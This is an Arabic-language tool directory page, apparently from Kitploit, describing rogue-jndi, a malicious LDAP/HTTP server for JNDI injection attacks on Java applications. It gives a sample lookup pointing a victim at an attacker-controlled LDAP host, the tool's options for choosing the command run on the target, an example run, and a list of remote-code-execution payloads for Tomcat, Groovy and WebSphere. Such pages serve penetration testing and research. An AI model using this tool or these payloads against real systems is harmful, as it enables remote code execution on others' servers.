Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
rogue-jndi — خادم LDAP خبيث لشن هجمات حقن JNDI | Kitploit
أدوات/GitHubGitHub/veracode-research/rogue-jndi
الاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمرتطوير الحمولات
GitHubveracode-research/rogue-jndi

rogue-jndi

خادم LDAP خبيث لشن هجمات حقن JNDI

عرض المستودع
1.1k227منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Rogue JNDI

خادم LDAP خبيث لشن هجمات حقن JNDI.

الوصف

يحتوي المشروع على خوادم LDAP وHTTP لاستغلال واجهة برمجة تطبيقات JNDI في Java غير الآمنة افتراضيًا.
لتنفيذ هجوم، يمكنك تشغيل هذه الخوادم محليًا ثم تحفيز تحليل JNDI على العميل المُصاب، على سبيل المثال:

root@kitploit:~
InitialContext.doLookup("ldap://your_server.com:1389/o=reference");

سيؤدي ذلك إلى بدء اتصال من العميل المُصاب بخادم LDAP المحلي. بعد ذلك، يستجيب الخادم المحلي بإدخال خبيث يحتوي على أحد الحمولات، والتي قد تكون مفيدة لتحقيق تنفيذ أكواد عن بُعد (RCE).

الدافع

بالإضافة إلى طرق هجمات JNDI المعروفة (عبر تحميل الفئات عن بُعد في المراجع)، تقدم هذه الأداة نواقل هجوم جديدة من خلال الاستفادة من قوة ObjectFactories.

الحمولات المدعومة

  • RemoteReference.java - هجوم JNDI كلاسيكي، يؤدي إلى تنفيذ أكواد عن بُعد عبر تحميل الفئات عن بُعد، ويعمل حتى إصدار jdk8u191
  • Tomcat.java - يؤدي إلى تنفيذ أكواد عن بُعد عبر انعكاس غير آمن في org.apache.naming.factory.BeanFactory
  • Groovy.java - يؤدي إلى تنفيذ أكواد عن بُعد عبر انعكاس غير آمن في org.apache.naming.factory.BeanFactory + groovy.lang.GroovyShell
  • WebSphere1.java - يؤدي إلى هجوم XXE خارج النطاق (OOB XXE) في com.ibm.ws.webservices.engine.client.ServiceFactory
  • WebSphere2.java - يؤدي إلى تنفيذ أكواد عن بُعد عبر التلاعب بمسار الفئات في com.ibm.ws.client.applicationclient.ClientJ2CCFFactory

الاستخدام

root@kitploit:~
$ java -jar target/RogueJndi-1.0.jar -h
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Usage: java -jar target/RogueJndi-1.0.jar [options]
  Options:
    -c, --command  Command to execute on the target server (default: 
                   /Applications/Calculator.app/Contents/MacOS/Calculator) 
    -n, --hostname Local HTTP server hostname (required for remote 
                   classloading and websphere payloads) (default: 
                   192.168.1.10) 
    -l, --ldapPort Ldap bind port (default: 1389)
    -p, --httpPort Http bind port (default: 8000)
    --wsdl         [websphere1 payload option] WSDL file with XXE payload 
                   (default: /list.wsdl)
    --localjar     [websphere2 payload option] Local jar file to load (this 
                   file should be located on the remote server) (default: 
                   ../../../../../tmp/jar_cache7808167489549525095.tmp) 
    -h, --help     Show this help

أهم المعاملات هي اسم مضيف خادم LDAP (‎-n، ويجب أن يكون قابلاً للوصول من الهدف) والأمر الذي تريد تنفيذه على الخادم الهدف (‎-c).

كبديل لخيار "‎-c"، يمكنك تعديل ملف ExportObject.java بوضع كود Java الذي تريد تنفيذه على الخادم الهدف.

مثال:

root@kitploit:~
$ java -jar target/RogueJndi-1.1.jar --command "nslookup your_dns_sever.com" --hostname "192.168.1.10"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2

البناء

يتطلب Java v1.7+ وMaven v3+

root@kitploit:~
mvn package

إخلاء مسؤولية

يُقدَّم هذا البرنامج لأغراض تعليمية فقط و/أو لاختبار الأنظمة التي حصل المستخدم على إذن مسبق لاستهدافها.

شكر خاص

  • Alvaro Muñoz وOleksandr Mirosh على الورقة البحثية الممتازة حول هجمات JNDI
  • @zerothoughts على مستودع spring-jndi الملهم
  • Moritz Bechler على بحث marshallsec البارز
  • Orange Tsai وWelk1n على ثغرة (gadget) Apache + Groovy

روابط

  • مقال حول استغلال حقن JNDI في Java في مدونة Veracode
  • كيف اخترقت فيسبوك مرة أخرى! RCE غير مصادق على MobileIron MDM

المؤلفون

Michael Stepankin

تنزيل الأداة